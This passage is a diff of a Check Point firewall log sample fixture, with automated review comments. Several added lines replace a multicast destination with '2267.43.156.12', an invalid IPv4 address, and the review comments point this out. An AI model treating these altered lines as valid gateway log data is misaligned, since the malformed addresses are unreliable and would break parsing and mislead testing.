src:"192.168.1.1"] <134>1 2020-03-29T20:18:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e81028f,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"36815"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T20:18:26Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e810292,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"] <134>1 2020-03-29T20:18:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102af,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51542"; service:"443"; service_id:"https"; src:"192.168.1.117"] 
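Review bot: `dst:"2267.43.156.12"` on the three added lines that replace `224.0.0.1` (the igmp event, the 5351→5350 event and the 5351→5351 event) is not a valid IPv4 address, since the first octet 2267 exceeds 255, so the sanitised sample no longer parses as an IP at all. The sibling hunks in this file substitute the well-formed `175.16.199.1`, which suggests this is a typo for something like `dst:"227.43.156.12"`; whatever value is chosen should be one the module's ingest pipeline can convert to an `ip`-typed field, otherwise the golden expected output for this fixture will presumably record a conversion error rather than a destination address. Note also that `224.0.0.1` is the IGMP all-hosts multicast group, so swapping it for a unicast address changes what these three events exercise; if the goal was only to avoid a routable public address, a reserved multicast address keeps the sample faithful to the original traffic.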
@@ -4997,7 +4997,7 @@
 <134>1 2020-03-29T20:19:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b8,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51544"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b8,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51545"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102b9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49040"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64962"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
+<134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"64962"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.81.142.43"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"40990"; service:"443"; service_id:"https"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10447"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56594"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:19:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102be,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.31"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"36230"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10448"; xlatesrc:"0.0.0.0"]
@@ -5006,8 +5006,8 @@
 <134>1 2020-03-29T20:19:14Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
 <134>1 2020-03-29T20:19:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.196"]
 <134>1 2020-03-29T20:19:16Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102c4,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:19:23Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ca,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:19:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102cc,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51547"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102cc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"51548"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35842"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
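Review bot: The two added lines in this hunk replace `dst:"224.0.0.1"` with `dst:"2267.43.156.12"`, which is not a valid IPv4 address (the first octet exceeds 255), so any pipeline that converts `dst` into an `ip`-typed destination field will fail on these two sample events or leave the value unconverted, and the fixture no longer represents what a gateway can actually emit. The same malformed value is introduced in the `@@ -5017,8 +5017,8 @@` and `@@ -5062,7 +5062,7 @@` hunks and in the hunk preceding `@@ -4997,7 +4997,7 @@`. If the intent is to swap the multicast address for a non-routable placeholder, a documentation-range value such as `dst:"203.0.113.12"` (constructed example) would be valid and should be applied consistently across all of these hunks, with the expected-output fixture regenerated to match.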
@@ -5017,8 +5017,8 @@
 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52314"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T20:19:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102eb,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.36"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"43950"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10452"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T20:19:56Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
-<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"]
+<134>1 2020-03-29T20:20:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8102f5,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"]
 <134>1 2020-03-29T20:20:57Z gw-da58d3 CheckPoint 8363 - [action:"Drop"; flags:"395524"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81032b,0x0,0x6401a8c0,0x108620ab}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"3"; parent_rule:"0"; rule_action:"Drop"; rule_name:"Cleanup rule"; rule_uid:"76fd22f2-efa8-4c81-a617-40201d3f5c4e"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"68"; service:"67"; service_id:"bootp"; src:"0.0.0.0"]
